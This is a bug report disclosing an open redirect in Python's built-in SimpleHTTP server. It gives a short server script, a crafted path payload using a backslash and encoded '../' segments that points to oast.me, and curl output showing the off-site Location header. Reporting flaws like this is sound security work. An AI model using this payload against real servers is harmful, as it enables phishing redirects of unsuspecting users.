Bug Report
Description
We identified that when using Simple HTTP in Python 3.9.19 with the payload /\\oast.me/%2e%2e%2f, an open redirect vulnerability arises.
This could potentially allow attackers to redirect users to malicious websites or resources, leading to phishing attacks or the exploitation of sensitive information.
Steps to Reproduce
- Run the following code with Python 3.9.19.
#!/usr/bin/env python3
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer

address = ''  # bind to all interfaces
port = 8080
Handler = SimpleHTTPRequestHandler  # serves files from the current working directory
TCPServer((address, port), Handler).serve_forever()
- Craft a payload containing /\\oast.me/%2e%2e%2f..
- Attempt to access the server with the crafted payload.
- Observe the redirection behavior.
Output of curl
$ curl --noproxy "*" -I -x GET http://127.0.0.1:8080/\\oast.me/%2e%2e%2f
HTTP/1.0 301 Moved Permanently
Server: SimpleHTTP/0.6 Python/3.9.19
Date: Mon, 21 Apr 2025 11:06:08 GMT
Location: /\oast.me/%2e%2e%2f/
Content-Length: 0
Issue
If the URL path contains /\\oast.me/%2e%2e%2f, the Location header of the response includes /\oast.me/%2e%2e%2f/.
It redirects to http://oast.me/..%2f/.
Expected Result
If the Location header starts with /, it is interpreted as a relative path on the same server.
Version
3.9.19
3.9.21
3.8.18
3.12.5
OS
Ubuntu 20.04.6 LTS